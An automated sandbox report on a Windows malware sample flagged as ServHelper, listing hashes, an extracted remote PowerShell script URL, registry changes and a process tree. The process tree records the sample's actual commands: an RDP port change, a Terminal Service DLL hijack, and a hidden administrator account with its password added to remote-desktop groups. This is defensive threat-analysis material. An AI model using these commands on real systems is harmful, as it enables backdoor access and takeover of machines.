Analysis
-
max time kernel
50s -
max time network
125s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
19-08-2021 19:34
Static task
static1
Behavioral task
behavioral1
Sample
87dd0632a95ca24443f8c6363bc055e6.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
87dd0632a95ca24443f8c6363bc055e6.exe
Resource
win10v20210410
General
-
Target
87dd0632a95ca24443f8c6363bc055e6.exe
-
Size
5.9MB
-
MD5
87dd0632a95ca24443f8c6363bc055e6
-
SHA1
423785b67d20f4f5056ff6d9e34fda3c72a03bd4
-
SHA256
266562d82899806c0eafc3ca72216e78d41403dd24effebd31d7635922ba96ce
-
SHA512
c51d180cca074540f5ca9186e60509cfdb1c7e1a8651e691eac585df9f8352e256cedb86a4a340e0e8f5b1ed6d73ff270d92424259539c0c4c02a7048f2a75e2
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata: ET MALWARE ServHelper CnC Inital Checkin
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 18 2268 powershell.exe 20 2268 powershell.exe 21 2268 powershell.exe 22 2268 powershell.exe 24 2268 powershell.exe 26 2268 powershell.exe 28 2268 powershell.exe 30 2268 powershell.exe 32 2268 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 2 IoCs
Processes:
pid process 3252 3252 -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIA88B.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIA8DB.tmp powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIA86B.tmp powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_vlxy30jc.3bs.ps1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIA8EC.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_ni1x2fi4.0wu.psm1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIA89C.tmp powershell.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exeWMIC.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache," powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1400 = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0 powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\ powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 20 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 21 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 22 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 24 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 3668 powershell.exe 3668 powershell.exe 3668 powershell.exe 2064 powershell.exe 2064 powershell.exe 2064 powershell.exe 2088 powershell.exe 2088 powershell.exe 2088 powershell.exe 3848 powershell.exe 3848 powershell.exe 3848 powershell.exe 3668 powershell.exe 3668 powershell.exe 3668 powershell.exe 2268 powershell.exe 2268 powershell.exe 2268 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 612 612 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
87dd0632a95ca24443f8c6363bc055e6.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3916 87dd0632a95ca24443f8c6363bc055e6.exe Token: SeDebugPrivilege 3668 powershell.exe Token: SeDebugPrivilege 2064 powershell.exe Token: SeIncreaseQuotaPrivilege 2064 powershell.exe Token: SeSecurityPrivilege 2064 powershell.exe Token: SeTakeOwnershipPrivilege 2064 powershell.exe Token: SeLoadDriverPrivilege 2064 powershell.exe Token: SeSystemProfilePrivilege 2064 powershell.exe Token: SeSystemtimePrivilege 2064 powershell.exe Token: SeProfSingleProcessPrivilege 2064 powershell.exe Token: SeIncBasePriorityPrivilege 2064 powershell.exe Token: SeCreatePagefilePrivilege 2064 powershell.exe Token: SeBackupPrivilege 2064 powershell.exe Token: SeRestorePrivilege 2064 powershell.exe Token: SeShutdownPrivilege 2064 powershell.exe Token: SeDebugPrivilege 2064 powershell.exe Token: SeSystemEnvironmentPrivilege 2064 powershell.exe Token: SeRemoteShutdownPrivilege 2064 powershell.exe Token: SeUndockPrivilege 2064 powershell.exe Token: SeManageVolumePrivilege 2064 powershell.exe Token: 33 2064 powershell.exe Token: 34 2064 powershell.exe Token: 35 2064 powershell.exe Token: 36 2064 powershell.exe Token: SeDebugPrivilege 2088 powershell.exe Token: SeIncreaseQuotaPrivilege 2088 powershell.exe Token: SeSecurityPrivilege 2088 powershell.exe Token: SeTakeOwnershipPrivilege 2088 powershell.exe Token: SeLoadDriverPrivilege 2088 powershell.exe Token: SeSystemProfilePrivilege 2088 powershell.exe Token: SeSystemtimePrivilege 2088 powershell.exe Token: SeProfSingleProcessPrivilege 2088 powershell.exe Token: SeIncBasePriorityPrivilege 2088 powershell.exe Token: SeCreatePagefilePrivilege 2088 powershell.exe Token: SeBackupPrivilege 2088 powershell.exe Token: SeRestorePrivilege 2088 powershell.exe Token: SeShutdownPrivilege 2088 powershell.exe Token: SeDebugPrivilege 2088 powershell.exe Token: SeSystemEnvironmentPrivilege 2088 powershell.exe Token: SeRemoteShutdownPrivilege 2088 powershell.exe Token: SeUndockPrivilege 2088 powershell.exe Token: SeManageVolumePrivilege 2088 powershell.exe Token: 33 2088 powershell.exe Token: 34 2088 powershell.exe Token: 35 2088 powershell.exe Token: 36 2088 powershell.exe Token: SeDebugPrivilege 3848 powershell.exe Token: SeIncreaseQuotaPrivilege 3848 powershell.exe Token: SeSecurityPrivilege 3848 powershell.exe Token: SeTakeOwnershipPrivilege 3848 powershell.exe Token: SeLoadDriverPrivilege 3848 powershell.exe Token: SeSystemProfilePrivilege 3848 powershell.exe Token: SeSystemtimePrivilege 3848 powershell.exe Token: SeProfSingleProcessPrivilege 3848 powershell.exe Token: SeIncBasePriorityPrivilege 3848 powershell.exe Token: SeCreatePagefilePrivilege 3848 powershell.exe Token: SeBackupPrivilege 3848 powershell.exe Token: SeRestorePrivilege 3848 powershell.exe Token: SeShutdownPrivilege 3848 powershell.exe Token: SeDebugPrivilege 3848 powershell.exe Token: SeSystemEnvironmentPrivilege 3848 powershell.exe Token: SeRemoteShutdownPrivilege 3848 powershell.exe Token: SeUndockPrivilege 3848 powershell.exe Token: SeManageVolumePrivilege 3848 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
87dd0632a95ca24443f8c6363bc055e6.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid process target process PID 3916 wrote to memory of 3668 3916 87dd0632a95ca24443f8c6363bc055e6.exe powershell.exe PID 3916 wrote to memory of 3668 3916 87dd0632a95ca24443f8c6363bc055e6.exe powershell.exe PID 3668 wrote to memory of 1300 3668 powershell.exe csc.exe PID 3668 wrote to memory of 1300 3668 powershell.exe csc.exe PID 1300 wrote to memory of 1904 1300 csc.exe cvtres.exe PID 1300 wrote to memory of 1904 1300 csc.exe cvtres.exe PID 3668 wrote to memory of 2064 3668 powershell.exe powershell.exe PID 3668 wrote to memory of 2064 3668 powershell.exe powershell.exe PID 3668 wrote to memory of 2088 3668 powershell.exe powershell.exe PID 3668 wrote to memory of 2088 3668 powershell.exe powershell.exe PID 3668 wrote to memory of 3848 3668 powershell.exe powershell.exe PID 3668 wrote to memory of 3848 3668 powershell.exe powershell.exe PID 3668 wrote to memory of 3252 3668 powershell.exe reg.exe PID 3668 wrote to memory of 3252 3668 powershell.exe reg.exe PID 3668 wrote to memory of 2176 3668 powershell.exe reg.exe PID 3668 wrote to memory of 2176 3668 powershell.exe reg.exe PID 3668 wrote to memory of 3976 3668 powershell.exe reg.exe PID 3668 wrote to memory of 3976 3668 powershell.exe reg.exe PID 3668 wrote to memory of 2200 3668 powershell.exe net.exe PID 3668 wrote to memory of 2200 3668 powershell.exe net.exe PID 2200 wrote to memory of 2232 2200 net.exe net1.exe PID 2200 wrote to memory of 2232 2200 net.exe net1.exe PID 3668 wrote to memory of 1072 3668 powershell.exe cmd.exe PID 3668 wrote to memory of 1072 3668 powershell.exe cmd.exe PID 1072 wrote to memory of 2156 1072 cmd.exe cmd.exe PID 1072 wrote to memory of 2156 1072 cmd.exe cmd.exe PID 2156 wrote to memory of 1636 2156 cmd.exe net.exe PID 2156 wrote to memory of 1636 2156 cmd.exe net.exe PID 1636 wrote to memory of 1832 1636 net.exe net1.exe PID 1636 wrote to memory of 1832 1636 net.exe net1.exe PID 3668 wrote to memory of 1432 3668 powershell.exe cmd.exe PID 3668 wrote to memory of 1432 3668 powershell.exe cmd.exe PID 1432 wrote to memory of 3100 1432 cmd.exe cmd.exe PID 1432 wrote to memory of 3100 1432 cmd.exe cmd.exe PID 3100 wrote to memory of 4000 3100 cmd.exe net.exe PID 3100 wrote to memory of 4000 3100 cmd.exe net.exe PID 4000 wrote to memory of 3884 4000 net.exe net1.exe PID 4000 wrote to memory of 3884 4000 net.exe net1.exe PID 2668 wrote to memory of 1852 2668 cmd.exe net.exe PID 2668 wrote to memory of 1852 2668 cmd.exe net.exe PID 1852 wrote to memory of 368 1852 net.exe net1.exe PID 1852 wrote to memory of 368 1852 net.exe net1.exe PID 2332 wrote to memory of 2184 2332 cmd.exe net.exe PID 2332 wrote to memory of 2184 2332 cmd.exe net.exe PID 2184 wrote to memory of 3876 2184 net.exe net1.exe PID 2184 wrote to memory of 3876 2184 net.exe net1.exe PID 3840 wrote to memory of 2008 3840 cmd.exe net.exe PID 3840 wrote to memory of 2008 3840 cmd.exe net.exe PID 2008 wrote to memory of 1636 2008 net.exe net1.exe PID 2008 wrote to memory of 1636 2008 net.exe net1.exe PID 2064 wrote to memory of 344 2064 cmd.exe net.exe PID 2064 wrote to memory of 344 2064 cmd.exe net.exe PID 344 wrote to memory of 1168 344 net.exe net1.exe PID 344 wrote to memory of 1168 344 net.exe net1.exe PID 1296 wrote to memory of 368 1296 cmd.exe net.exe PID 1296 wrote to memory of 368 1296 cmd.exe net.exe PID 368 wrote to memory of 3704 368 net.exe net1.exe PID 368 wrote to memory of 3704 368 net.exe net1.exe PID 4056 wrote to memory of 1652 4056 cmd.exe net.exe PID 4056 wrote to memory of 1652 4056 cmd.exe net.exe PID 1652 wrote to memory of 684 1652 net.exe net1.exe PID 1652 wrote to memory of 684 1652 net.exe net1.exe PID 424 wrote to memory of 2696 424 cmd.exe WMIC.exe PID 424 wrote to memory of 2696 424 cmd.exe WMIC.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\87dd0632a95ca24443f8c6363bc055e6.exe"C:\Users\Admin\AppData\Local\Temp\87dd0632a95ca24443f8c6363bc055e6.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3916 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3668 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zfhdxg5m\zfhdxg5m.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:1300 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6C3D.tmp" "c:\Users\Admin\AppData\Local\Temp\zfhdxg5m\CSCFAC60B4AB7C947009A3AFB3947D1A5FC.TMP"4⤵PID:1904
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2064 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2088 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3848 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:3252
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:2176 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:3976
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:2200 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:2232
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:1072 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:1636 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:1832
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:1432 -
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:3100 -
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:4000 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:3884
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:4000
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:2076
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
PID:2668 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
PID:1852 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:368
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc i0aAay1y /add1⤵
- Suspicious use of WriteProcessMemory
PID:2332 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc i0aAay1y /add2⤵
- Suspicious use of WriteProcessMemory
PID:2184 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc i0aAay1y /add3⤵PID:3876
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:3840 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:2008 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:1636
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:2064 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:344 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD3⤵PID:1168
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:1296 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:368 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:3704
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc i0aAay1y1⤵
- Suspicious use of WriteProcessMemory
PID:4056 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc i0aAay1y2⤵
